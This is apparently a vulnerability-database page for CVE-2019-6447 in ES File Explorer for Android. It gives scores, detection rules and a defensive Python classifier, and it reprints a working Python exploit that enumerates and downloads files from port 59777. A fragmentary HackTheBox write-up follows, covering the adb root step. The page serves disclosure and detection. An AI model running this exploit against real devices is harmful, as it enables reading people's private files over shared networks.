CVE-2019-6447
Published 2019-01-16
Priority: P2 · 71 · high · CVSS 3.1: 8.1
Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploit: available
EPSS: 62.02% (99.1th percentile)
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| estrongs | es_file_explorer_file_manager | <= 4.1.9.7.4 | — |
Detection & IOCs (extracted from sources)
Detections:
- Detect unauthenticated HTTP POST requests to TCP port 59777 with Content-Type: application/json and a body containing a 'command' key; this is the exploit trigger for CVE-2019-6447.
- Monitor for HTTP GET requests to port 59777 with a file path appended (e.g., GET /storage/emulated/0/...); this is the file download vector used by the exploit.
- Flag any process or network listener binding to TCP port 59777 on an Android device; the port stays open after ES File Explorer has been launched once.
- Nmap identifies port 59777 as 'Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older'; that fingerprint on a mobile/Android device is a strong indicator of the vulnerable ES File Explorer service.
- The Metasploit auxiliary module 'scanner/http/es_file_explorer_open_port' both detects and exercises the open port; requests matching its traffic in HTTP or sensor logs indicate active scanning or exploitation attempts.
Context and caveats:
- The vulnerable HTTP server on port 59777 is only reachable from the local Wi-Fi network, so remote exploitation is limited to network-adjacent attackers; it is not internet-exposed by default.
- The port stays open even after the user backgrounds the app, so detection and blocking should not assume the app must be in the foreground.
- The Metasploit module was tested against version 4.1.9.5.1 specifically, though all versions through 4.1.9.7.4 are reported vulnerable.
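A small detection routine for the indicators above, added here as an example and not taken from any of the cited sources. The per-request record layout (dst_port, method, path, headers, body) and the sample records are constructed for the illustration; it labels JSON command posts and file-path GETs against port 59777 as high-confidence hits and anything else on that port as a probe:

```python
import json
from typing import Dict, List, Optional, Tuple

ES_PORT = 59777  # ES File Explorer's unauthenticated HTTP listener (CVE-2019-6447)

# Constructed sample traffic, modelled on a sensor logging one HTTP request per
# record. Not real captures; the field names are this example's own convention.
SAMPLE_REQUESTS: List[Dict] = [
    {"src": "10.0.0.5", "dst": "10.0.0.9", "dst_port": 59777, "method": "POST", "path": "/",
     "headers": {"Content-Type": "application/json"}, "body": '{"command":"listFiles"}'},
    {"src": "10.0.0.5", "dst": "10.0.0.9", "dst_port": 59777, "method": "GET",
     "path": "/storage/emulated/0/DCIM/creds.jpg", "headers": {}, "body": ""},
    {"src": "10.0.0.5", "dst": "10.0.0.9", "dst_port": 59777, "method": "GET", "path": "/",
     "headers": {}, "body": ""},
    {"src": "10.0.0.5", "dst": "10.0.0.9", "dst_port": 59777, "method": "POST", "path": "/",
     "headers": {"Content-Type": "application/json"}, "body": '{"command":'},   # malformed JSON
    {"src": "10.0.0.5", "dst": "10.0.0.7", "dst_port": 443, "method": "POST", "path": "/api",
     "headers": {"Content-Type": "application/json"}, "body": '{"command":"listFiles"}'},
]


def classify(req: Dict) -> Optional[str]:
    """Label one request, or return None when it is not aimed at the ES listener port."""
    if req.get("dst_port") != ES_PORT:
        return None  # the same JSON shape on any other port means nothing here
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    method, path = req.get("method", ""), req.get("path", "")
    if method == "POST" and headers.get("content-type", "").startswith("application/json"):
        try:
            body = json.loads(req.get("body") or "")
        except ValueError:
            body = None  # malformed JSON: still traffic to the port, but not a confirmed command
        if isinstance(body, dict) and "command" in body:
            return f"es-file-explorer-command:{body['command']}"
    if method == "GET" and path not in ("", "/"):
        return f"es-file-explorer-file-read:{path}"  # arbitrary file fetch by appended path
    return "es-file-explorer-probe"


def scan(requests: List[Dict]) -> List[Tuple[int, str]]:
    """Run classify over a batch; returns (record index, label) for every hit."""
    hits = []
    for i, req in enumerate(requests):
        label = classify(req)
        if label is not None:
            hits.append((i, label))
    return hits


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_REQUESTS):
        r = SAMPLE_REQUESTS[idx]
        print(f"{r['src']} -> {r['dst']}:{r['dst_port']} {r['method']} {r['path']}  [{label}]")
```

The port check comes first on purpose: the JSON body shape is generic, so without the port gate the rule would fire on unrelated APIs (the last sample record). The probe label is deliberately low-confidence and exists so that a malformed or unexpected request to 59777 is still surfaced for triage.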
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.1 | HIGH | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N |
| nvd | v2.0 | 4.8 | MEDIUM | AV:A/AC:L/Au:N/C:P/I:P/A:N |
GHSA
GHSA-2pqf-jwpx-hmhw (ghsa_unreviewed · 2022-05-13 · CVE-2019-6447 · HIGH · CWE-306)
Description: identical to the CVE text above.
Exploit-DB
ES File Explorer 4.1.9.7.4 - Arbitrary File Read (exploitdb · 2021-06-29 · CVE-2019-6447 · HIGH · CVSS 8.1)
```python
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import json
import sys

import requests

if len(sys.argv) < 3:
    print("Usage: " + sys.argv[0] + " <command> <target IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'   # ES File Explorer's unauthenticated HTTP listener
cmd = sys.argv[1]
cmds = ['listFiles', 'listPics', 'listVideos', 'listAudios', 'listApps', 'listAppsSystem',
        'listAppsPhone', 'listAppsSdcard', 'listAppsAll', 'getFile', 'getDeviceInfo']
listCmds = cmds[:9]   # the nine enumeration commands; each returns a JSON array

if cmd not in cmds:
    print("[-] WRONG COMMAND!")
    print("Available commands : ")
    print(" listFiles : List all Files.")
    print(" listPics : List all Pictures.")
    print(" listVideos : List all videos.")
    print(" " + ", ".join(cmds[3:]))
    sys.exit(1)

# The listing on the page is cut off here; the request logic below follows the
# protocol the advisory describes (JSON 'command' POST, file fetch by GET path).
if cmd == 'getFile':
    if len(sys.argv) < 4:
        print("[-] getFile needs a path, e.g. /storage/emulated/0/DCIM/photo.jpg")
        sys.exit(1)
    r = requests.get(url + sys.argv[3])            # path is appended straight to the URL
    out = sys.argv[3].rsplit('/', 1)[-1] or 'downloaded.bin'
    open(out, 'wb').write(r.content)
    print("[+] Saved " + str(len(r.content)) + " bytes to " + out)
else:
    r = requests.post(url, data=json.dumps({'command': cmd}),
                      headers={'Content-Type': 'application/json'})
    try:
        entries = json.loads(r.text)
    except ValueError:
        print(r.text)                               # unexpected body: show it raw
        sys.exit(0)
    if cmd in listCmds:
        for entry in entries:
            print(entry)
    else:
        print(entries)                              # getDeviceInfo returns a single object
```
Metasploit
ES File Explorer Open Port (auxiliary/scanner/http/es_file_explorer_open_port)
This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable. This module has been tested against 4.1.9.5.1.
CTF
easy / README (ctf_writeups · CVSS 6.0 · MEDIUM)
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
CTF
Explore / README (ctf_writeups · CVSS 8.1 · CVE-2019-6447 · HIGH)
# Explore - HackTheBox - Writeup
Android, 20 Base Points, Easy
## Machine
### TL;DR
To solve this machine, we begin by enumerating open services, finding the ports `2222`, `5555`, `33897`, `42135` and `59777`.
***User:*** The related ports belong to the [ES File Explorer](https://es-file-explorer.en.uptodown.com/android) application, which is affected by [CVE-2019-6447](https://nvd.nist.gov/vuln/detail/CVE-2019-6447) and lets us read files from the device. Using that, we found an image containing SSH credentials.
***Root:*** Port `5555` is `adb`. After creating an SSH tunnel to it, run `adb root` and then `adb shell` to get a shell as the root user.
## Explore Solution
### User
Let's start with `nmap` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Explore]
└──╼ $ n
```
References
- http://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
- https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
- https://twitter.com/fs0c131y/status/1085460755313508352